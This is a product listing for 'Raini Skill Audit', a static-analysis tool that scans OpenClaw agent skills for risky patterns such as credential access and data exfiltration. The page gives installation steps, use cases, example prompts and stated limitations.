Raini Skill Audit
Skill by 0xraini
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/0xraini/raini-skill-auditWhat This Skill Does
The Raini Skill Audit is a critical security-focused tool for the OpenClaw ecosystem, designed to protect users from supply chain attacks and malicious code execution within third-party agents. As AI agents gain the capability to read local files and execute commands, the risk of downloading a compromised skill increases significantly. This audit tool acts as a static analysis engine that parses skill codebases to identify risky patterns, such as unauthorized access to credentials, sensitive data exfiltration to external webhooks, or the use of dangerous functions like eval() and exec(). By providing a detailed risk score and a breakdown of security findings, it empowers users to make informed decisions before enabling unknown skills.
Installation
To integrate this security layer into your OpenClaw environment, use the provided ClawHub command. Ensure you have Node.js installed in your runtime environment to support the audit CLI script.
clawhub install openclaw/skills/skills/0xraini/raini-skill-audit
Once installed, the agent will gain the capability to run security assessments on any local path or specific skill name retrieved from your library.
Use Cases
- Pre-Install Verification: Automatically scan any new skill from the community before it is initialized or granted permissions.
- Periodic Security Audits: Regularly scan your active skill workspace to ensure that dependencies have not been compromised through malicious updates.
- Development Workflow: Developers creating their own OpenClaw skills can use this audit tool to ensure their code meets standard security best practices before publishing to ClawHub.
- Enterprise Compliance: Ensure that any agent deployed within a production environment does not contain high-risk code patterns that violate data privacy policies.
Example Prompts
- "Scan all my currently installed skills to see if any have high-risk patterns."
- "Please audit the 'moltdash' skill and let me know if it tries to access my .env files."
- "Run a security audit on the local directory at ./projects/experimental-agent and give me a summary report."
Tips & Limitations
This tool performs static analysis, which is highly effective at catching blatant malicious patterns but may struggle with highly obfuscated, multi-stage, or runtime-generated malware. Always treat skills with high-risk findings with extreme caution. The tool is not a replacement for sandboxing; it is a diagnostic utility meant to supplement your existing security posture. Ensure the audit script itself is kept updated by pulling the latest changes from the openclaw/skills source repository to benefit from newly added detection rules and pattern matching updates.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-0xraini-raini-skill-audit": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-read, code-execution